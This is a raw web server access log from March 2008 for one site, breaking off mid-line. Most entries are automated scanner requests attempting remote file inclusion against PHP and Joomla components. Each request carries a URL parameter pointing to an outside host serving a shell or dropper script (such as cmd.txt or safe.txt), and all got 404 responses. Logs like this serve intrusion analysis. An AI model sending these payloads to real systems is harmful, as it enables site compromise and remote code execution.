216.241.32.144 - - [13/Mar/2008:09:24:02 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:24:02 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.143 - - [13/Mar/2008:09:24:02 -0700] "GET /logs/access_080124.log/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.143 - - [13/Mar/2008:09:24:02 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:24:02 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.144 - - [13/Mar/2008:09:24:03 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.143 - - [13/Mar/2008:09:24:03 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://4internetgold.com/language/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:24:13 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:24:14 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.160.68 - - [13/Mar/2008:09:24:14 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.53.113.64 - - [13/Mar/2008:09:24:26 -0700] "GET /logs/access_080122.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.53.113.64 - - [13/Mar/2008:09:24:28 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.53.113.64 - - [13/Mar/2008:09:24:28 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:25:11 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:25:11 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:25:11 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [13/Mar/2008:09:25:11 -0700] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.181.182 - - [13/Mar/2008:09:26:52 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
202.160.178.95 - - [13/Mar/2008:09:26:55 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
205.209.147.34 - - [13/Mar/2008:09:27:19 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://football-cmex.ru/ssilochki/vetton/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:09:27:20 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:09:27:20 -0700] "GET /classes/core/language.php?rootdir=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:09:27:20 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.freewebtown.com/crxr/te